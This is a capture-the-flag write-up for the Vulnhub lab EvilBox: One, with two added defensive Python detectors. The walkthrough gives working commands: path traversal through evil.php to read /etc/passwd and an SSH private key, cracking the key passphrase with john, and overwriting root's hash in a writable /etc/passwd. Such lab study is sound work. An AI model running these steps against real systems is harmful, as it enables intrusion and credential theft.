Vulnhub lab -- EVILBOX: ONE

Published: 2023-11-15 21:56:44 Author: 顾北清

Environment setup

Attacker host IP: 192.168.47.130
Target host IP: 192.168.47.131

Information gathering

Scanning the target host shows that ports 22 and 80 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 192.168.47.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-08 07:46 EST
Nmap scan report for 192.168.47.131
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E9:5C:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.47.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.78 seconds

Visiting the web page shows only the Apache default page.

Web vulnerability discovery

Brute-force directories with gobuster

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.47.131
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,php.bak,txt.bak,git.bak,git,zip,zip.bak,txt,html,js,html.bak,json
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/.html.bak            (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 317] [--> http://192.168.47.131/secret/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.html.bak            (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================

Visiting /robots.txt shows nothing of interest.

Visiting /secret shows a blank page.

Since /secret is a directory rather than a page, continue brute-forcing under http://192.168.47.131/secret/

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131/secret/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.47.131/secret/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip.bak,php,txt.bak,git,git.bak,html.bak,json,zip,txt,html,js,php.bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/.html.bak            (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/evil.php             (Status: 200) [Size: 0]
/.html.bak            (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================

This path contains /evil.php; visiting it also returns a blank page.

That means this PHP page most likely expects a parameter, but we do not yet know which one, so we fuzz the parameter name. While fuzzing, we consider whether this could be a file inclusion or command execution vulnerability. From the enumeration above we know there is an index.html page, so we try to read that page and see whether the parameter behaves like a file inclusion.
Here we use ffuf for the fuzzing.

┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.47.131/secret/evil.php?FUZZ=../index.html -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.47.131/secret/evil.php?FUZZ=../index.html
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

command                 [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
:: Progress: [6453/6453] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

The fuzzing reveals a parameter named command that can read files. Since files can be read, we try /etc/passwd; it shows that besides root there is a user named mowree.
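From the defender's side, the parameter fuzzing and traversal reads above leave a clear trace in the web server's access log. The following added example (not part of the original post) parses constructed Apache combined-format lines modelled on those requests, flags query parameters carrying `../` sequences (including percent-encoded forms), groups them per source and path, and mirrors the `-fs 0` filter to spot reads that most likely returned a file; the log lines and user agents are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache access-log lines modelled on the post's requests (not real logs)
SAMPLE_LOG = """\
192.168.47.130 - - [08/Nov/2023:07:50:01 -0500] "GET /secret/evil.php?command=../index.html HTTP/1.1" 200 10701 "-" "fuzzer"
192.168.47.130 - - [08/Nov/2023:07:50:01 -0500] "GET /secret/evil.php?id=../index.html HTTP/1.1" 200 0 "-" "fuzzer"
192.168.47.130 - - [08/Nov/2023:09:02:13 -0500] "GET /secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa HTTP/1.1" 200 1743 "-" "curl"
192.168.47.130 - - [08/Nov/2023:09:05:40 -0500] "GET /secret/evil.php?command=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1400 "-" "curl"
10.0.0.5 - - [08/Nov/2023:09:06:00 -0500] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\S+)')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # "../", "..\", leading or trailing ".."

def decode_fully(value, rounds=3):
    """Strip repeated percent-encoding so %2e%2e%2f and %252e%252e%252f are both caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse_line(line):
    """Return a finding dict if any query parameter carries a traversal sequence, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    hits = [(name, decode_fully(val))
            for name, val in parse_qsl(url.query, keep_blank_values=True)
            if TRAVERSAL.search(decode_fully(val))]
    if not hits:
        return None
    size = m.group('size')
    return {
        'ip': m.group('ip'), 'path': url.path, 'params': hits,
        # A 200 with a non-empty body is the defender's mirror of the post's "-fs 0" filter:
        # the server most likely returned the requested file.
        'likely_read': m.group('status') == '200' and size not in ('0', '-'),
    }

def analyse_log(text):
    """Group traversal findings by (source IP, path): request count, parameter names tried, likely reads."""
    findings = [f for f in (analyse_line(l) for l in text.splitlines()) if f]
    per_source = {}
    for f in findings:
        entry = per_source.setdefault((f['ip'], f['path']),
                                      {'requests': 0, 'param_names': set(), 'reads': 0})
        entry['requests'] += 1
        entry['param_names'].update(name for name, _ in f['params'])
        entry['reads'] += int(f['likely_read'])
    return findings, per_source

if __name__ == '__main__':
    for (ip, path), e in analyse_log(SAMPLE_LOG)[1].items():
        print(f"{ip} -> {path}: {e['requests']} traversal requests, "
              f"{len(e['param_names'])} parameter names tried, {e['reads']} likely file reads")
```

Many distinct parameter names carrying the same traversal payload from one source is the signature of the ffuf run above; a single parameter with a deep `../` chain and a non-empty 200 is the signature of the successful read.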

The initial scan showed that the target runs SSH, so we try reading /home/mowree/.ssh/id_rsa to see whether a private key exists.

The private key does exist, so we can use it to log in to the target host as that user.

┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mowree@192.168.47.131's password: 

When logging in with id_rsa it turns out the private key is encrypted, so we try cracking its passphrase with john.
First, convert the private key into a hash file john understands using john's ssh2john script:

┌──(kali㉿kali)-[~/tools]
└─$ curl http://192.168.47.131/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1743  100  1743    0     0   373k      0 --:--:-- --:--:-- --:--:--  425k
                                                                                                                  
┌──(kali㉿kali)-[~/tools]
└─$ cat id_rsa                                                                                                 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
-----END RSA PRIVATE KEY-----
                                                                                                                  
┌──(kali㉿kali)-[~/tools]
└─$ /usr/share/john/ssh2john.py id_rsa > hash

Then crack it with john; the passphrase is unicorn

┌──(kali㉿kali)-[~/tools]
└─$ john hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2023-11-08 09:13) 100.0g/s 124800p/s 124800c/s 124800C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Log in to the target host with the private key and its passphrase

┌──(kali㉿kali)-[~/tools]
└─$ chmod 600 id_rsa
                                                                                                                  
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ 

Privilege escalation

Collect information about the target host

mowree@EvilBoxOne:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:e9:5c:d1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.47.131/24 brd 192.168.47.255 scope global dynamic ens33
       valid_lft 1225sec preferred_lft 1225sec
    inet6 fe80::20c:29ff:fee9:5cd1/64 scope link 
       valid_lft forever preferred_lft forever
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ pwd
/home/mowree

Look for SUID files usable for privilege escalation; nothing useful is found

mowree@EvilBoxOne:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su

Run the linpeas script directly; it reports that /etc/passwd is writable

Since the file is readable and writable, we generate a hash for a password of our own and overwrite root's password field with it; first create the hash for the custom password 12345678

mowree@EvilBoxOne:~$ openssl passwd -1
Password: 
Verifying - Password: 
$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1

Switch to root; privilege escalation succeeded.

mowree@EvilBoxOne:~$ cat /etc/passwd | head -n 5
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mowree@EvilBoxOne:~$ su root
Contraseña: 
root@EvilBoxOne:/home/mowree#
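A host-side check for the condition linpeas reported, added here as an example and not part of the original post: it parses a constructed /etc/passwd excerpt modelled on the output above, flags any account whose password field holds a hash instead of the shadow marker (and, going beyond the post, any second UID 0 account or empty password field), and reports group- or world-writable mode bits. The `audit_system` helper and the `backdoor` line are assumptions for illustration.

```python
import os
import stat

# Constructed /etc/passwd excerpt modelled on the post's output (not a real system file)
SAMPLE_PASSWD = """\
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
backdoor:x:0:0:backdoor:/root:/bin/bash
mowree:x:1000:1000:mowree:/home/mowree:/bin/bash
"""

LOCKED = {'x', '*', '!', '!!'}   # shadowed or locked markers; anything else is a live hash

def audit_passwd_content(text):
    """Return (line, kind, account) findings for a passwd file body."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            findings.append((lineno, 'malformed', line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == '':
            findings.append((lineno, 'empty-password', name))   # login with no password at all
        elif pw not in LOCKED:
            # A hash here takes precedence over /etc/shadow: whoever wrote it chose the password.
            findings.append((lineno, 'hash-in-passwd', name))
        if uid == '0' and name != 'root':
            findings.append((lineno, 'extra-uid0', name))
    return findings

def audit_passwd_mode(mode):
    """Flag group- or world-writable bits; mode is the st_mode of /etc/passwd (expected 0644)."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append('world-writable')
    if mode & stat.S_IWGRP:
        findings.append('group-writable')
    return findings

def audit_system(path='/etc/passwd'):
    """Run both checks against a live file (hypothetical helper, not from the post)."""
    with open(path) as fh:
        content_findings = audit_passwd_content(fh.read())
    return content_findings, audit_passwd_mode(os.stat(path).st_mode)

if __name__ == '__main__':
    print(audit_passwd_content(SAMPLE_PASSWD))
    print(audit_passwd_mode(0o100666))   # what a world-writable passwd file reports
```

On a correctly configured system both functions return empty lists; the root entry above is flagged because its second field is an MD5-crypt hash rather than `x`, which is exactly what the `openssl passwd -1` step produced.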